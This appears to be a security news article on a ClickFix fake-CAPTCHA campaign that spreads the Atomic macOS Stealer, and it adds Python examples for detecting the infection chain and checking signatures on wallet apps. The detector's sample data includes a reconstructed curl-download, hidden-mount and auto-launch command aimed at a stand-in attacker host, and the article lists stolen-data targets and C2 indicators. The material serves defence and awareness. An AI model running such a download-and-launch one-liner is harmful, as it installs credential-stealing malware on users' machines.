Cybersecurity researchers have uncovered a new campaign targeting macOS users with the Atomic macOS Stealer (AMOS) malware through a growing social engineering tactic known as ClickFix.
The campaign starts with a fake CAPTCHA page that instructs users to open the macOS Terminal app and paste a command to verify they are human. While the process appears legitimate, the command actually downloads and launches malware on the victim’s device.
Researchers from Palo Alto Networks Unit 42 found that the malicious command silently downloads a disk image (DMG) file from an attacker-controlled server, mounts it using macOS’s built-in tools, and automatically launches the application contained inside. Unlike earlier attacks that required users to open downloaded files manually, this method streamlines the infection process and reduces user interaction.
ClickFix attacks have become increasingly popular over the past year. Cybercriminals and even state-backed threat actors have used fake browser errors, system alerts, and CAPTCHA pages to convince users to execute malicious commands on their own devices.
In this campaign, the Terminal command downloads a malicious DMG file to a temporary folder using curl, then mounts it without displaying it in Finder. The script searches for an application or installer package inside the mounted image and launches it automatically.
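The chain described in the last two paragraphs (curl to a temp folder, a mount hidden from Finder, automatic launch of whatever .app or .pkg is inside) is something an EDR rule can key on. The Python below is an added example, not code from the article or from Unit 42. It assumes a sensor that records the full command line a terminal-spawned shell executes, that the "mounted without displaying it in Finder" step is `hdiutil attach -nobrowse` (the article does not name the flag), and that the terminal app names are the usual suspects; the process events are constructed, with a placeholder domain and only the DMG name taken from the article.

```python
"""Heuristic detection of the ClickFix DMG drop-and-mount chain.

Added example, not Unit 42's tooling. Assumes a sensor that records the full
pasted command line; the events at the bottom are constructed, not telemetry.
"""
import re
import shlex
from dataclasses import dataclass, field

# Assumption: terminal emulators a victim is likely to paste the command into.
TERMINAL_APPS = {"Terminal", "iTerm2", "Warp", "Alacritty", "kitty"}
# Path prefixes that count as a "temporary folder" (literal or via $TMPDIR).
TEMP_PREFIXES = ("/tmp/", "/private/tmp/", "/var/folders/", "$TMPDIR", "${TMPDIR}")
# Split a pasted one-liner into its component commands.
SEPARATORS = re.compile(r"\s*(?:&&|\|\||;|\|)\s*")
# Strip "VAR=$(" so a command wrapped in a substitution is still classified.
SUBST_PREFIX = re.compile(r"^\s*[A-Za-z_]\w*=\$\(\s*")


@dataclass
class ProcEvent:
    pid: int
    parent_name: str   # app that spawned the shell, e.g. "Terminal"
    cmdline: str       # command string the sensor recorded


@dataclass
class Finding:
    pid: int
    stages: list = field(default_factory=list)  # chain stages in order seen
    url: str = ""                               # download URL, if recovered


def classify(cmd: str) -> tuple:
    """Map one shell command to a chain stage: ("stage", url) or ("", "")."""
    cmd = SUBST_PREFIX.sub("", cmd)
    try:
        argv = shlex.split(cmd)
    except ValueError:            # unbalanced quotes: fall back to a plain split
        argv = cmd.split()
    while argv and argv[0] in ("do", "then", "else"):   # skip loop/if keywords
        argv = argv[1:]
    if not argv:
        return "", ""
    prog, rest = argv[0].rsplit("/", 1)[-1], argv[1:]
    if prog in ("curl", "wget"):
        urls = [a for a in rest if a.startswith(("http://", "https://"))]
        to_temp = any(a.startswith(TEMP_PREFIXES) for a in rest)
        is_dmg = any(a.lower().endswith(".dmg") for a in rest)
        if urls and (to_temp or is_dmg):
            return "download", urls[0]
    elif prog == "hdiutil" and "attach" in rest:
        return ("mount_hidden" if "-nobrowse" in rest else "mount"), ""
    elif prog == "find" and any(a.endswith((".app", ".pkg")) for a in rest):
        return "locate", ""
    elif prog == "open":
        return "launch", ""
    return "", ""


def detect(events) -> list:
    """Return a Finding for each terminal-spawned command line that downloads a
    DMG into a temp folder and mounts it hidden from Finder; locate/launch
    stages are recorded to show how far the chain went."""
    findings = []
    for ev in events:
        if ev.parent_name not in TERMINAL_APPS:
            continue
        finding = Finding(pid=ev.pid)
        for cmd in SEPARATORS.split(ev.cmdline):
            stage, url = classify(cmd)
            if stage:
                finding.stages.append(stage)
                finding.url = finding.url or url
        if "download" in finding.stages and "mount_hidden" in finding.stages:
            findings.append(finding)
    return findings


# Constructed sample events (not real telemetry). The first mirrors the chain
# in the article; the domain is a placeholder, only the DMG name is from it.
SAMPLE_EVENTS = [
    ProcEvent(4242, "Terminal",
              'D="$TMPDIR/s.01M0td.dmg"; '
              'curl -fsSL https://attacker.invalid/s.01M0td.dmg -o "$D"; '
              'V=$(hdiutil attach -nobrowse "$D" | grep Volumes | awk \'{print $3}\'); '
              'A=$(find "$V" -maxdepth 1 -name "*.app" -o -name "*.pkg" | head -1); '
              'open "$A"'),
    ProcEvent(4243, "Terminal", "hdiutil attach ~/Downloads/Editor-4.1.dmg"),
    ProcEvent(4244, "Terminal", "curl -fsSL https://example.com/setup.sh | sh"),
    ProcEvent(4245, "launchd", "hdiutil attach -nobrowse /tmp/build.dmg"),
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"pid {f.pid}: ClickFix DMG chain {' -> '.join(f.stages)} from {f.url}")
```

Only the first event fires: a plain double-click-style `hdiutil attach` on a file in Downloads (no download, not hidden), a curl-pipe-sh installer (no DMG, no temp path) and a build job under launchd (not a terminal child) all stay quiet. The alert condition is deliberately the two-stage core of the chain so that a variant which drops the `find` or `open` step is still caught.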
Researchers observed the malware being delivered through a disk image named “s.01M0td.dmg,” which contained a self-signed application called “NNApp.app.” The payload belongs to the Atomic macOS Stealer family, a well-known information-stealing malware targeting Apple devices.
Once installed, the malware displays a fake system authentication prompt designed to trick users into entering their macOS password. If entered, the password is captured by the attackers.
The stealer targets a wide range of browsers, including Google Chrome, Microsoft Edge, Brave, Opera, Arc, Vivaldi, CocCoc, and Yandex. It steals stored passwords, cookies, payment card information, browser profiles, browsing history, and authentication tokens.
Firefox-based browsers are also targeted, including LibreWolf, SeaMonkey, Tor Browser, Waterfox, and Zen Browser. The malware also collects similar information from these browsers.
Cryptocurrency users face additional risks. The malware searches for wallet data associated with Exodus, Electrum, Atomic Wallet, Wasabi Wallet, Bitcoin Core, Litecoin Core, DashCore, Guarda, Binance Wallet, Dogecoin Wallet, and TonKeeper.
Researchers also found that the malware steals data from Telegram Desktop, Discord, Apple Notes, Safari, and Apple Keychain databases. User documents with PDF, TXT, and RTF file extensions are also collected.
All stolen information is compressed into a ZIP archive and uploaded to servers controlled by the attackers. The researchers also discovered that the malware can replace legitimate installations of Ledger Live and Trezor Suite with malicious versions, potentially enabling cryptocurrency theft.
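Because the stealer can swap a genuine Ledger Live or Trezor Suite install for a malicious one, the check a practitioner wants is whether the bundle on disk still carries the vendor's Developer ID signature. The Python below is an added example, not code from Unit 42 or from either wallet vendor. It pins the vendor's Apple Team ID (the values here are placeholders you must replace with the ID read from a known-good install) and runs the two `codesign` invocations; the `codesign` output samples at the bottom are constructed so the logic can be exercised off a Mac.

```python
"""Verify that a wallet app bundle still carries its vendor's Developer ID
signature. Added example, not from Unit 42 or the wallet vendors. Team IDs are
placeholders; pin the real value from a known-good install with
`codesign -dv --verbose=2 "/Applications/Ledger Live.app"` (printed on stderr).
"""
import subprocess
from dataclasses import dataclass

# Placeholder Team IDs (assumption): replace with values pinned from a trusted install.
PINNED_TEAM_IDS = {
    "/Applications/Ledger Live.app": "PINNED_LEDGER_TEAM_ID",
    "/Applications/Trezor Suite.app": "PINNED_TREZOR_TEAM_ID",
}


@dataclass
class Verdict:
    path: str
    ok: bool
    reason: str


def parse_codesign(details: str) -> dict:
    """Parse `codesign -dv` key=value lines; Authority= repeats (leaf cert first)."""
    info = {"Authority": []}
    for line in details.splitlines():
        key, sep, value = line.partition("=")
        if not sep:
            continue
        if key.strip() == "Authority":
            info["Authority"].append(value.strip())
        else:
            info[key.strip()] = value.strip()
    return info


def assess(path: str, verify_ok: bool, details: str, expected_team: str) -> Verdict:
    """Decide from the two codesign results whether the bundle is the vendor's."""
    if not verify_ok:
        return Verdict(path, False, "codesign --verify failed: bundle unsigned or modified")
    info = parse_codesign(details)
    team = info.get("TeamIdentifier", "not set")
    if team == "not set":
        return Verdict(path, False, "no Team ID: ad-hoc or self-signed certificate")
    if team != expected_team:
        return Verdict(path, False, f"Team ID {team} does not match pinned {expected_team}")
    leaf = info["Authority"][0] if info["Authority"] else ""
    if not leaf.startswith("Developer ID Application:"):
        return Verdict(path, False, "leaf certificate is not a Developer ID Application cert")
    return Verdict(path, True, f"signed by {leaf}")


def check_app(path: str, expected_team: str) -> Verdict:
    """Live check on macOS: runs codesign against the bundle at `path`."""
    verify = subprocess.run(["codesign", "--verify", "--deep", "--strict", path],
                            capture_output=True, text=True)
    details = subprocess.run(["codesign", "-dv", "--verbose=2", path],
                             capture_output=True, text=True)
    return assess(path, verify.returncode == 0, details.stderr, expected_team)


# Constructed codesign output (not captured from real bundles) for offline use.
VENDOR_SIGNED = """Executable=/Applications/Ledger Live.app/Contents/MacOS/Ledger Live
Authority=Developer ID Application: Vendor Name (PINNED_LEDGER_TEAM_ID)
Authority=Developer ID Certification Authority
Authority=Apple Root CA
TeamIdentifier=PINNED_LEDGER_TEAM_ID
"""
SELF_SIGNED = """Executable=/Applications/Ledger Live.app/Contents/MacOS/Ledger Live
Authority=Some Self-Signed Certificate
TeamIdentifier=not set
"""
OTHER_DEVELOPER = """Executable=/Applications/Trezor Suite.app/Contents/MacOS/Trezor Suite
Authority=Developer ID Application: Someone Else (OTHERTEAM01)
Authority=Developer ID Certification Authority
Authority=Apple Root CA
TeamIdentifier=OTHERTEAM01
"""

if __name__ == "__main__":
    for path, team in PINNED_TEAM_IDS.items():
        v = check_app(path, team)
        print(("OK  " if v.ok else "BAD ") + f"{path}: {v.reason}")
```

Pinning the Team ID rather than just requiring "some valid Developer ID" matters: a replacement bundle can carry a perfectly valid Apple-issued signature from a different developer, and `codesign --verify` alone would accept it. The `--deep --strict` verify catches the other case, a vendor bundle whose contents were modified after signing.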
The campaign was linked to command-and-control infrastructure hosted at svs-verificationdate[.]beer and 196.251.107[.]171.
Security experts advise users to be extremely cautious when websites ask them to open Terminal and run commands. CAPTCHA pages, browser fixes, and troubleshooting instructions should never require users to execute commands they do not fully understand. If you cannot clearly identify what a command does, do not run it.